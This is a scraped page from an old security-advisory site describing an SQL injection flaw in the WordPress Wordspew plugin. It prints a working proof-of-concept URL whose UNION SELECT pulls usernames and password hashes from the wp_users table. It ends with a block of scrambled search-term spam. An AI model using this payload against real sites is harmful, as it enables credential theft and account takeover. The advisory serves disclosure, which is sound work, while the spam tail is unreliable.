about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WordPress Plugin Wordspew SQL Injection Vulnerability


Title WordPress Plugin Wordspew SQL Injection Vulnerability
Published 2008-02-04-12:00AM
Updated 2008-02-04-09:17PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  S@BUN discovered this vulnerability.
Vulnerable  Wordspew Wordspew 0
Not Vulnerable  
Code  An attacker can exploit this issue via a browser.The following proof-of-concept URI is available:http://www.example.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 03:23:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
root 2.6 MS05-042 www.clwjgb Ruger Wap.gadis. phpBB%20%2 almanar.co fuc.in www.njzkkj i...a.co.k tool Pumochka 78av.cn ful mambo Remo www.teaen. www.seo91. qishima.ms www.xayf.c Www.S?x.Ch www.sexyvi sex33 www .tkyxg www.hfgp16 Desi kahan www.gjszy. www.condom aeroninfo. www.gjszy. ...t/comp Priyanka c SSLVerify boardwalk 708125.cn phpLive%25 www.cddjkj www.73ku.c www.boyaxi www.708125 maxcpm.inf mallu hot File no po all cartoo www.cddjkj www.2inews bugil di k news for c www.boyaxi news for c Www soon 1